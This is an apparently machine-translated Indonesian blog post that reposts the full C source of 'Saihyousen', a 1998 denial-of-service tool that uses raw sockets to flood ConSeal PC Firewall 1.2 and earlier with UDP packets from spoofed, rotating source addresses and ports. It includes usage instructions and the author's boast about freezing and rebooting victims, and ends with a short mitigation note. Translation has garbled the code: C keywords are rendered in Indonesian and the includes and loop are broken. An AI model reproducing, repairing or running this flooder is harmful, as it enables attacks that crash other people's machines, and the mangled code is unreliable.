Wednesday, September 2, 2009

ConSeal PC Firewall killer

ConSeal PC Firewall killer


Ini adalah DoS cukup mudah terhadap ConSeal PC Firewall. Hanya bekerja pada versi yang mendahului Juni 1998 (karena saya diberitahu mereka dari masalah dan mereka tetap dalam waktu seminggu) yang versi 1.2 atau kurang. Tapi semua pups warez kecil di luar sana masih ada yang lebih tua versi yang ini bekerja melawan. Ini tidak terlalu istimewa, tapi banjir terus terang tidak bekerja, aku harus melemparkan di beberapa hal yang harus mengubah IP dan aku menemukannya membeku mesin lebih cepat jika port juga berubah. Saihyousen menyebabkan Conseal makan sampai SEMUA sumber daya yang tersedia dan dapat menyebabkan reboot sangat kacau jika serangan itu terus selama sekitar 10-30 detik setelah mesin membeku. Pada akhir program memiliki apa yang dapat Anda lakukan untuk menyelamatkan diri, tetapi bagi anda yang dibayar untuk perangkat lunak hanya mendapatkan paling baru hanya untuk versi tertentu. Ini dia kode sumber, aku jenis baru di pemrograman di C jadi jangan repot-repot memberitahu saya bahwa aku payah, hanya membuatnya lebih baik dan mail ke saya. ---- Cut ------- / * Saihyousen Attack (Jepang * * Ice Breaker) Dengan NOC-Upah (MCSR) * Basis kode dari arnudp.c tapi sangat diubah. Awalnya ditulis * Kapan awal April 1998, aku sedikit kabur untuk tanggal. * * Saya tidak bertanggung jawab atas tindakan apapun yang script kiddies * Berpikir bahwa menjalankan ini terhadap salah satu beberapa adalah cara yang menyenangkan untuk berlalu * Hidup tidak berguna mereka. Saya juga di klaim NO WAY untuk menjadi baik di * Pemrograman, sehingga memodifikasi semua yang Anda inginkan, hanya meninggalkan kredit kepada saya * Dan PLEASE mengirimkan saya salinan kode Anda diubah. * * Saya memilih pemutus es karena malam sebelum menulis program ini * Aku membaca semua dari William Gibson Neuromancer sementara menggendong * Sebuah botol kosong Kanada Club dan sakit flu. * * CARA IT WORKS: * Cara program ini membunuh mesin yang terjadi dalam 2 cara * # 1 Jika Conseal diatur untuk "belajar" mode paket banjir dari * Semua IP dan port yang berbeda akan menyebabkan program untuk terus * Mencoba untuk menulis aturan-aturan baru yang lebih dan lebih. Ini akhirnya akan menggunakan * Semua sumber daya dan hasil di bekukan dan akhirnya reboot. * # 2 Jika ConSeal diatur ke log serangan, sekali lagi karena jumlah * Paket sumber daya sistem yang dimakan dan mesin mati. * * Aku diuji dx2/66 menjalankan RedHat 4.0 (12 MB ram) * Sebagai penyerang dan Pentium 233 (64 MB ram) * Sebagai korban. Menggunakan ConSeal pentium 233 yang membeku setelah sekitar 5 * Detik serangan. (Ini adalah jaringan, tapi aku telah melakukan hidup pengujian * Melalui koneksi ppp (33.6/28.8) dan butuh waktu hanya beberapa detik lagi. * Karena paket-paket yang sangat kecil yang 28,8 dial-up tidak akan ketinggalan di * Semua, 14,4 akan mendapatkan minor setelah sekitar 20.000 paket. Jadi kirim sebagai banyak * Seperti yang Anda inginkan, biasanya 40.000 akan membunuh apa pun. * * Teriakan: teman bodoh saya yang kecanduan ICQ: Essence * # Snickers terutama rendah hati (cakrawala), colonwq, n `tropy, sheenie, Sygma! Howdy * untuk Acid_Red Miltonians sesama (Mully, dan Tom) * # Hacker, `Lo SUidRoot, ICBM, drsmoke, Epic, Trix, modred, menghentikan * Dan semua sisanya! * Bukankah kita semua merindukan Tron? * Nullifier, sepupu saya (Hei Al H ***) * / / * Jika kompilasi di linux semua, tidak terlalu yakin tentang BSD, jika Anda memodifikasi untuk membuat * Lebih baik dalam beberapa cara juga silahkan mail aku, aku akan tertarik melihatnya. * / # Include # Include # Include # Include # Include # Include # Include # Include # Include # Include # Include # Ifdef BROKEN_LIBC # Include # Lain # Define u_char unsigned char # Define u_short unsigned pendek # Endif struct sockaddr sa; argc int main (int, char ** argv) ( int fd; int x = 1; int hosti = 192; int hostii = 168; hostiii int = 1; int meep = 0; fooport int = 1; numpack int = 0; char [funhost 15]; struct sockaddr_in * p; struct * hostent dia; gram u_char [36] = ( 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3 ', '1', '3 ', '3', '7 ', '8', '9 ', '0' ); if (argc! = 3) ( fprintf (stderr, "Saihyousen, oleh \ n NOC-Upah"); fprintf (stderr, "Semakin cepat koneksi Anda ke internet adalah (latency bijaksana, bukan bandwidth) \ n "); fprintf (stderr, "dan semakin rendah kecepatan CPU korban akan \ n nincrease probabilitas sukses \ "); fprintf (stderr, "penggunaan:% s num_of_packets korban Ex: saihyousen 40.000 127.0.0.1 \ n ", argv *); exit (1); ); if ((fd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) ( perror ("memerlukan RAW Socket"); exit (1); ); # Ifdef IP_HDRINCL if (setsockopt (fd, IPPROTO_IP, IP_HDRINCL, (char *) & x, sizeof (x)) <0)>
(
perror ("setsockopt IP_HDRINCL");
exit (1);
);
# Lain
fprintf (stderr, "kita tidak punya IP_HDRINCL :-( \ n \ n");
# Endif

/ * Hal di bawah ini adalah agar hal itu tidak sepenuhnya berurutan yaitu
100.100.100.101, 100.100.100.102 * /
untuk (numpack = 0;
if (meep == 0) (+ + hosti; meep + +;)
if (hosti> 254) hosti = 1;
if (meep == 1) (+ + hostii; meep + +;)
if (hostii> 254) hostii = 1;
if (meep == 2) (+ + hostiii; meep = 0;)
if (hostiii> 254) hostiii = 1;

sprintf (funhost, "% i.% i.% i.% i", hosti, hostii, hostiii, hosti);
(Dia = gethostbyname (funhost));
bcopy (* (h_addr_list ia->), (12 gram), 4);

if ((dia = gethostbyname (argv [1 ]))== NULL)
(
fprintf (stderr, "tidak dapat menyelesaikan tujuan nama host \ n");
exit (1);
);
bcopy (* (h_addr_list ia->), (16 gram), 4);
fooport + +;
/ * Reset port untuk 1 jika itu menjelang akhir * nilai yang mungkin /
if (fooport> 65530) (fooport = 1;);
* (* U_short) (20 gram) = htons ((u_short) fooport);
* (* U_short) (22 gram) = htons ((u_short) fooport);

p = (struct sockaddr_in *) &sa;
p-> sin_family = AF_INET;
bcopy (* (h_addr_list ia->), & (sin_addr p->), sizeof (struct in_addr));

if ((sendto (fd, & gram, sizeof (gram), 0, (struct sockaddr *) p, sizeof (struct
sockaddr )))== -1)
(
perror ("sendto");
exit (1);
);
/ * Printf ("Packet #% i \ n", numpack); * /
/ * Matikan terus untuk melihat di mana Anda berada .. itu akan memperlambat serangan meskipun * /
);
printf ("Attack terhadap% s selesai", argv [1]);
putchar ('\ n');
return 1;
)


/ * Bagaimana melindungi diri sendiri?
* Well it's cukup sederhana, belajar dan penebangan menonaktifkan modus.
* Signal9 telah dibuat menyadari masalah ini sebelum saya memutuskan PANJANG
* Untuk melepaskannya, sehingga orang-orang yang benar-benar dibayar untuk itu dan menyimpan salinan mereka

* Diperbarui seharusnya tidak memiliki masalah. Sesungguhnya orang-orang di luar sana yang digunakan
* Sebuah crack atau key generator mungkin jenis yang duduk di IRC
* Warez saluran sepanjang hari. Seperti yang kita semua tahu IRC adalah sangat berbahaya
* Tempat pups warez jadi saya kira Anda tidak dilindungi karena dapat
* Berpikir.
*
* Www.signal9.com Anda dapat men-download dan upgrade exsisting
* Salinan yang Anda miliki.
* Jangan menangis datang kepada saya jika Anda bajakan salinan yang agak murah
* Bagian dari perangkat lunak pukulan di wajah Anda.
* /

0 comments:

Post a Comment